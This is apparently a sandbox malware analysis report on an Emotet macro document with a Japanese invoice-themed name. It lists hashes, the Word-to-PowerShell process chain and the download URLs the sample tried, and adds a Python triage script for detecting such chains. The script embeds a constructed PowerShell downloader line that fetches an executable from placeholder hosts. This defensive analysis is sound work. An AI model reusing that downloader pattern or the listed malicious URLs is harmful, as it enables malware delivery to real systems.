| Field | Value |
|---|---|
| File name | 1614_202008 ご入金額の通知・ご請求書発行のお願い.doc (Japanese: "Notice of payment amount / request to issue an invoice") |
| Full analysis | https://app.any.run/tasks/90c95aab-9e4d-4b78-b911-432d77c5cecc |
| Verdict | Malicious activity |
| Threats | Emotet: a modular trojan that evolved into a loader for other malware. It is distributed mainly through mass spam campaigns carrying macro-enabled Office documents like this one; corporate networks are the primary target, but private users are infected as well. |
| Analysis date | September 30, 2020, 09:16:31 |
| OS | Windows 7 Professional Service Pack 1 (build 7601, 32-bit) |
| Tags | — |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Molestiae., Author: Alicia Blanchard, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Aug 27 23:37:00 2020, Last Saved Time/Date: Thu Aug 27 23:37:00 2020, Number of Pages: 1, Number of Words: 5, Number of Characters: 29, Security: 0 |
| MD5 | CA15F9F45971EA442943084547761994 |
| SHA1 | F4134B9DF06C604BEF7619DB66500DF2684AE000 |
| SHA256 | A02A8AD984B702BCF392E49FC099D28BB09A1FB57ACC50FE3F090678F3FEF082 |
| SSDEEP | 3072:C6Yy0u8YGgjv+ZvchmkHcI/o1/Vb6//////////////////////////////////Y:CC0uXnWFchmmcI/o1/+Qswayp |
| Extension | File type match | Score |
|---|---|---|
| .doc | Microsoft Word document | 54.2 |
| .doc | Microsoft Word document (old ver.) | 32.2 |

| Metadata field | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| LocaleIndicator | 1033 |
| CodePage | Unicode UTF-16, little endian |
| HeadingPairs | — |
| TitleOfParts | — |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 15 |
| CharCountWithSpaces | 33 |
| Paragraphs | 1 |
| Lines | 1 |
| Company | — |
| Security | None |
| Characters | 29 |
| Words | 5 |
| Pages | 1 |
| ModifyDate | 2020:08:27 22:37:00 |
| CreateDate | 2020:08:27 22:37:00 |
| TotalEditTime | — |
| Software | Microsoft Office Word |
| RevisionNumber | 1 |
| LastModifiedBy | — |
| Template | Normal.dotm |
| Comments | — |
| Keywords | — |
| Author | Alicia Blanchard |
| Subject | — |
| Title | Molestiae. |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2240 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\1614_202008 ご入金額の通知・ご請求書発行のお願い.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
| 1904 | powersheLL -e [base64-encoded command removed] | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe | — | wmiprvse.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2240 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA78B.tmp.cvr | — | — | — |
| 2240 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFB615778F1FFDACAF.TMP | — | — | — |
| 1904 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NYAKCAZU77PY6NUFXDS4.temp | — | — | — |
| 2240 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$14_202008 ご入金額の通知・ご請求書発行のお願い.doc | pgc | F47CB4852805CE4EF0D0C7CA9D876A27 | 4D0496909BFEC7E73F9960D76EC2E53DA77F2581EA5DA58B5E058B08BC0BD579 |
| 2240 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | DB7ED30F2AF244B37602E9A8FA40BC69 | 6C261EB204362985E24872BAC097DA758424FC98F9EA7C6D717C17385EC5961A |
| 2240 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | A2DB20460CB9A7257C2F56D05BF0A421 | 385FF7270BC9432F66B7AC295968B9B5805A067D3F47E76B1C2EA71ADEED2D16 |
| 1904 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bb4d9.TMP | binary | 4028388263805ABA00088A0BA4EEA515 | 5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 |
| 1904 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 4028388263805ABA00088A0BA4EEA515 | 5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1904 | powersheLL.exe | GET | 403 | 74.96.241.34:80 | http://theeldestgeek.com/error/FS/ | US | html | 743 b | suspicious |
1904 | powersheLL.exe | GET | 301 | 185.221.108.96:80 | http://tuls.pl/cgi-bin/7a9/ | unknown | html | 234 b | unknown |
1904 | powersheLL.exe | GET | 404 | 108.60.15.59:80 | http://rickthewelder.com/dtbkup20110205/i/ | CA | html | 124 b | suspicious |
1904 | powersheLL.exe | GET | 404 | 185.221.108.96:80 | http://tuls.pl/cgi-bin/7a9 | unknown | html | 1.52 Kb | unknown |
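The process tree and the HTTP table above together show the usual Emotet maldoc chain: WINWORD.EXE opens the document, the macro launches PowerShell through WMI (so the parent is wmiprvse.exe rather than Word), the binary name is typed with odd casing ("powersheLL"), the payload is passed with `-e` as a base64 UTF-16LE string, and the script then walks a list of download URLs until one answers, which in this run none did (403, 301, 404, 404). The following Python is an added example, not part of the ANY.RUN report, showing how to triage such events offline. The process and HTTP events are constructed to mirror the report; the encoded PowerShell payload is a constructed stand-in with reserved, non-resolving hostnames, because the real one is not reproduced on the page.

```python
"""Triage helpers for an Emotet-style maldoc chain (added example, constructed data)."""
import base64
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    image: str      # full image path as logged
    cmdline: str
    parent: str     # parent image name


@dataclass
class HttpEvent:
    pid: int
    status: int
    url: str


# Constructed stand-in for the removed "-e" payload: a list of candidate URLs
# tried in order until one download succeeds. Hosts use reserved TLDs.
SAMPLE_SCRIPT = (
    "$u='http://example.invalid/wp-content/x/@http://example.test/cgi-bin/y/'.Split('@');"
    "foreach($s in $u){try{(New-Object Net.WebClient).DownloadFile($s,$env:TEMP+'\\1.exe');break}catch{}}"
)


def encode_command(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process events mirroring the report's tree (PIDs 2240 and 1904).
SAMPLE_PROCS = [
    Proc(2240, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\1614.doc"',
         "explorer.exe"),
    Proc(1904, r"C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe",
         "powersheLL -e " + encode_command(SAMPLE_SCRIPT), "wmiprvse.exe"),
]

# Constructed HTTP events copying the report's status codes and URLs for PID 1904.
SAMPLE_HTTP = [
    HttpEvent(1904, 403, "http://theeldestgeek.com/error/FS/"),
    HttpEvent(1904, 301, "http://tuls.pl/cgi-bin/7a9/"),
    HttpEvent(1904, 404, "http://rickthewelder.com/dtbkup20110205/i/"),
    HttpEvent(1904, 404, "http://tuls.pl/cgi-bin/7a9"),
]

# Matches -e, -ec, -enc, -encodedcommand (any casing) followed by a base64 blob.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script text from a -EncodedCommand argument, or '' if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def extract_urls(script: str) -> list:
    """Pull http(s) URLs out of decoded script text ('@' is Emotet's usual list separator)."""
    return re.findall(r"""https?://[^\s'"@;)]+""", script)


def triage_process(p: Proc) -> list:
    """Suspicious traits of one process-creation event (empty list if none)."""
    name = image_name(p.image)
    findings = []
    if name.lower() in ("powershell.exe", "pwsh.exe"):
        # NTFS is case-insensitive, so the logged name reflects how the macro typed it.
        if name not in ("powershell.exe", "PowerShell.exe", "pwsh.exe"):
            findings.append("unusual casing in image name: " + name)
        if ENC_FLAG.search(p.cmdline):
            findings.append("encoded command")
        # Office spawning via WMI Win32_Process.Create makes WmiPrvSE the parent.
        if p.parent.lower() in ("wmiprvse.exe", "winword.exe", "excel.exe"):
            findings.append("spawned by " + p.parent)
    return findings


def triage(procs) -> dict:
    return {p.pid: f for p in procs if (f := triage_process(p))}


def download_sweep(events, pid: int) -> tuple:
    """Distinct hosts one PID contacted, and whether any request returned HTTP 200."""
    mine = [e for e in events if e.pid == pid]
    hosts = []
    for e in mine:
        host = re.match(r"https?://([^/]+)", e.url).group(1)
        if host not in hosts:
            hosts.append(host)
    return hosts, any(e.status == 200 for e in mine)


if __name__ == "__main__":
    for pid, f in triage(SAMPLE_PROCS).items():
        print(pid, f)
    print(extract_urls(decode_encoded_command(SAMPLE_PROCS[1].cmdline)))
    print(download_sweep(SAMPLE_HTTP, 1904))
```

Two points worth noting from the report that the helper encodes: match the image name case-insensitively (a rule keyed on the literal string `powershell.exe` misses `powersheLL.exe`), and treat `wmiprvse.exe` as an Office-adjacent parent, since a rule that only looks for Word as the direct parent of PowerShell would not fire on this sample. The sweep over several unrelated domains with non-200 answers, all from one PowerShell PID, is itself a strong signal even though no payload was retrieved and the process exited with code 0.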
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1904 | powersheLL.exe | 64.90.34.152:443 | paulburkphotography.com | New Dream Network, LLC | US | unknown |
1904 | powersheLL.exe | 174.136.37.108:80 | sitecgps.com | Colo4, LLC | US | unknown |
1904 | powersheLL.exe | 162.241.88.184:80 | tfbauru.com.br | CyrusOne LLC | US | suspicious |
1904 | powersheLL.exe | 74.96.241.34:80 | theeldestgeek.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | suspicious |
1904 | powersheLL.exe | 185.221.108.96:80 | tuls.pl | — | — | unknown |
1904 | powersheLL.exe | 158.106.138.177:80 | uniquewv.com | — | US | unknown |
1904 | powersheLL.exe | 108.60.15.59:80 | rickthewelder.com | In2net Network Inc. | CA | suspicious |
| Domain | IP | Reputation |
|---|---|---|
| rickthewelder.com | 108.60.15.59 | suspicious |
| sitecgps.com | 174.136.37.108 | suspicious |
| tfbauru.com.br | 162.241.88.184 | suspicious |
| paulburkphotography.com | 64.90.34.152 | unknown |
| theeldestgeek.com | 74.96.241.34 | suspicious |
| uniquewv.com | 158.106.138.177 | unknown |
| dns.msftncsi.com | — | shared |
| tuls.pl | 185.221.108.96 | unknown |